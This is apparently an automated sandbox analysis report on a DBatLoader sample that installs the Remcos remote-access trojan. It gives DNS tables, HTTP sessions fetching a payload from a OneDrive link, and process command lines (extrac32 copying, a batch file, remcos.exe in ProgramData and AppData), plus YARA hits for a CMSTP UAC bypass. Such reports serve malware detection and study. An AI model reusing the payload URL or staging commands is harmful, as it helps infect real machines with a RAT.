| Apr 24, 2024 10:58:59.917632103 CEST | 192.168.2.6 | 1.1.1.1 | 0xc9f6 | Standard query (0) | xirfeg.sn.files.1drv.com | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 10:59:15.036705971 CEST | 192.168.2.6 | 1.1.1.1 | 0xe549 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 24, 2024 10:58:58.619640112 CEST | 1.1.1.1 | 192.168.2.6 | 0x3b5c | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.619640112 CEST | 1.1.1.1 | 192.168.2.6 | 0x3b5c | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.619640112 CEST | 1.1.1.1 | 192.168.2.6 | 0x3b5c | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.619640112 CEST | 1.1.1.1 | 192.168.2.6 | 0x3b5c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.619640112 CEST | 1.1.1.1 | 192.168.2.6 | 0x3b5c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.824547052 CEST | 1.1.1.1 | 192.168.2.6 | 0x4348 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.824547052 CEST | 1.1.1.1 | 192.168.2.6 | 0x4348 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.824547052 CEST | 1.1.1.1 | 192.168.2.6 | 0x4348 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.824547052 CEST | 1.1.1.1 | 192.168.2.6 | 0x4348 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.824547052 CEST | 1.1.1.1 | 192.168.2.6 | 0x4348 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 10:59:00.148185968 CEST | 1.1.1.1 | 192.168.2.6 | 0xc9f6 | No error (0) | xirfeg.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:59:00.148185968 CEST | 1.1.1.1 | 192.168.2.6 | 0xc9f6 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:59:15.190587997 CEST | 1.1.1.1 | 192.168.2.6 | 0xe549 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:59:15.190587997 CEST | 1.1.1.1 | 192.168.2.6 | 0xe549 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:59:15.190587997 CEST | 1.1.1.1 | 192.168.2.6 | 0xe549 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 24, 2024 10:59:15.190587997 CEST | 1.1.1.1 | 192.168.2.6 | 0xe549 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 10:59:15.190587997 CEST | 1.1.1.1 | 192.168.2.6 | 0xe549 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
• onedrive.live.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49711 | 13.107.137.11 | 443 | 2056 | C:\Users\user\Desktop\udVh4Ist4Z.exe |

Timestamp / Bytes transferred / Direction / Data

2024-04-24 08:58:59 UTC, 213 bytes, OUT:
GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com

2024-04-24 08:58:59 UTC, 1177 bytes, IN:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://xirfeg.sn.files.1drv.com/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWtLOerQ4av3Xm6HTixtKAThH9G-4anG68e8wV1Qrk2RPdiHNecy8RCqK5uh_yuJFSUBIFok8DGdj11PTrYBnhL5XYXHHBJ2Ngcz8FsPL0nwv83oiQrBe-qE2QgkGb51WouA06k6abex4k4_hxa5CtXJoeKmw/255_Xjfxsfmnmga?download&psid=1
Set-Cookie: E=P:ZC32xzxk3Ig=:gf72egvBchaFkW4GhoESqrq6fufu6UGXYYXzzAfBhi0=:F; domain=.live.com; path=/
Set-Cookie: xid=e1049b89-a0de-4bad-81a0-8a913e713135&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 07:18:59 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 08:58:59 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 57d8d6c5b8-msl47
X-ODWebServer: namsouthce375367-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 87361616C9914CDDA955E91C7278DD3A Ref B: BY3EDGE0311 Ref C: 2024-04-24T08:58:59Z
Date: Wed, 24 Apr 2024 08:58:59 GMT
Connection: close
Content-Length: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.6 | 49716 | 13.107.137.11 | 443 | 4040 | C:\Users\Public\Libraries\Xjfxsfmn.PIF |

Timestamp / Bytes transferred / Direction / Data

2024-04-24 08:59:15 UTC, 213 bytes, OUT:
GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com

2024-04-24 08:59:16 UTC, 1177 bytes, IN:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://xirfeg.sn.files.1drv.com/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3Ny-gJc1zykBmX5rYj9txW9R3kIzHF6dxV83l5heEa4PLxxwQWqeMm0OQWEc1f7icdv2kfJ7mTF-McvtGgF2w5lljaYU3ZMiQUKoUJVCed3J7leekUiF37s8NoidzJOtwh3TH73PJjGfpo7KC4z0jzjn5QlQ/255_Xjfxsfmnmga?download&psid=1
Set-Cookie: E=P:+HS70Txk3Ig=:DC3pJ6XrAb4XDrltQ5gluoG7MQWNiMcA6YdrWzAUw+Y=:F; domain=.live.com; path=/
Set-Cookie: xid=fa764b74-aa05-4064-bbf7-15e9e247033f&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 07:19:15 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 08:59:16 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 57d8d6c5b8-2lbqt
X-ODWebServer: namsouthce375367-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 4AF7ECC4517044E19B7D8DDF105D1922 Ref B: BY3EDGE0305 Ref C: 2024-04-24T08:59:15Z
Date: Wed, 24 Apr 2024 08:59:15 GMT
Connection: close
Content-Length: 0


Session ID: 2
Source IP: 192.168.2.6
Source Port: 49725
Destination IP: 13.107.137.11
Destination Port: 443
PID: 3708
Process: C:\Users\Public\Libraries\Xjfxsfmn.PIF

Timestamp: 2024-04-24 08:59:42 UTC
Bytes transferred: 213
Direction: OUT
Data:
GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com

Timestamp: 2024-04-24 08:59:42 UTC
Bytes transferred: 1177
Direction: IN
Data:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://xirfeg.sn.files.1drv.com/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa3zxnfUIKkPKwoVek0WzbG1sBfXbnn7j6CE35llpTYR8jWullRvburWFPOzYWZmPWfEh7HK5zgmIWLaeM4IWI8-2P2jGVB1DgJM_BOIsrxpI1008nTdqqWDEdXlS1rwrx6uAnbjPKKpjIHb5KX0KRzvJ5Nw/255_Xjfxsfmnmga?download&psid=1
Set-Cookie: E=P:YIGB4Txk3Ig=:cyj/OW5gsd9dnMF8QloDqdnQ5k5Bw8piqaCgPeNebuo=:F; domain=.live.com; path=/
Set-Cookie: xid=350d62be-3739-4ee0-98bc-64096d1675e5&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 07:19:42 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 08:59:42 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 58656754b6-fnrbf
X-ODWebServer: namsouthce155880-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 2B2F2BFB45E54D2DBC284776936ED645 Ref B: BY3EDGE0414 Ref C: 2024-04-24T08:59:42Z
Date: Wed, 24 Apr 2024 08:59:41 GMT
Connection: close
Content-Length: 0



                                                                                      Target ID:0
                                                                                      Start time:10:58:56
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\udVh4Ist4Z.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'639'424 bytes
                                                                                      MD5 hash:2CC30D206669699E58870623365FEF82
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:Borland Delphi
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" "
                                                                                      Imagebase:0x1c0000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\udVh4Ist4Z.exe C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF
                                                                                      Imagebase:0xd00000
                                                                                      File size:29'184 bytes
                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:10:59:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:10:59:02
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\ProgramData\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:10:59:13
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\Xjfxsfmn.PIF
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Libraries\Xjfxsfmn.PIF"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'639'424 bytes
                                                                                      MD5 hash:2CC30D206669699E58870623365FEF82
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2296612772.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 63%, ReversingLabs
                                                                                      • Detection: 66%, Virustotal
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:10:59:17
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:10:59:18
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal
                                                                                      Reputation:moderate
                                                                                      Has exited:true

Target ID:12
Start time:10:59:21
Start date:24/04/2024
Path:C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\Remcos\remcos.exe"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:10:59:29
Start date:24/04/2024
Path:C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\Remcos\remcos.exe"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:15
Start time:10:59:40
Start date:24/04/2024
Path:C:\Users\Public\Libraries\Xjfxsfmn.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Xjfxsfmn.PIF"
Imagebase:0x400000
File size:1'639'424 bytes
MD5 hash:2CC30D206669699E58870623365FEF82
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000002.2561591986.0000000002E21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:16
Start time:10:59:43
Start date:24/04/2024
Path:C:\Users\Public\Libraries\nmfsxfjX.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\nmfsxfjX.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:moderate
Has exited:true

Target ID:17
Start time:10:59:44
Start date:24/04/2024
Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:18
Start time:10:59:49
Start date:24/04/2024
Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true


Execution Graph

Execution Coverage:15.7%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:80.2%
Total number of Nodes:2000
Total number of Limit Nodes:28
36178 2d647b0 11 API calls 36175->36178 36180 2d88caa 36177->36180 36187 2d80aea 36178->36187 36182 2d644c4 11 API calls 36180->36182 36184 2d88cba 36182->36184 36186 2d644a0 11 API calls 36184->36186 36189 2d88cc5 36186->36189 36190 2d80b02 36187->36190 36191 2d644c4 11 API calls 36189->36191 36192 2d77be8 17 API calls 36190->36192 36194 2d88cd5 36191->36194 36195 2d80b0e 36192->36195 36197 2d644c4 11 API calls 36194->36197 36198 2d64824 11 API calls 36195->36198 36200 2d88ce5 36197->36200 36201 2d80b2f 36198->36201 36203 2d644a0 11 API calls 36200->36203 36204 2d80b3a 36201->36204 36205 2d88cf0 36203->36205 36209 2d80b47 36204->36209 36206 2d644c4 11 API calls 36205->36206 36208 2d88d00 36206->36208 38419 2d64c3c 36208->38419 36212 2d647b0 11 API calls 36209->36212 36221 2d80b66 36212->36221 36216 2d644c4 11 API calls 36218 2d88d20 36216->36218 36220 2d644c4 11 API calls 36218->36220 36223 2d88d30 36220->36223 36224 2d80b7e 36221->36224 36226 2d64c24 SysFreeString 36223->36226 36227 2d77be8 17 API calls 36224->36227 36229 2d88d3b 36226->36229 36230 2d80b8a 36227->36230 36232 2d644a0 11 API calls 36229->36232 37926 2d67a88 36230->37926 36235 2d88d46 36232->36235 36238 2d64c24 SysFreeString 36235->36238 36240 2d88d51 36238->36240 36244 2d644c4 11 API calls 36240->36244 36242 2d644f4 11 API calls 36245 2d80bb6 36242->36245 36247 2d88d61 36244->36247 36249 2d64824 11 API calls 36245->36249 36248 2d644c4 11 API calls 36247->36248 36251 2d88d71 36248->36251 36258 2d80bd7 36249->36258 36253 2d64c24 SysFreeString 36251->36253 36255 2d88d7c 36253->36255 36257 2d644a0 11 API calls 36255->36257 36260 2d88d87 36257->36260 36261 2d80bef 36258->36261 36263 2d64c24 SysFreeString 36260->36263 36264 2d647b0 11 API calls 36261->36264 36266 2d88d92 36263->36266 36273 2d80c0e 36264->36273 36268 2d644c4 11 API calls 36266->36268 36270 2d88da2 36268->36270 36272 2d64c24 SysFreeString 36270->36272 36275 2d88dad 36272->36275 36276 2d80c26 36273->36276 36278 2d644a0 11 API calls 
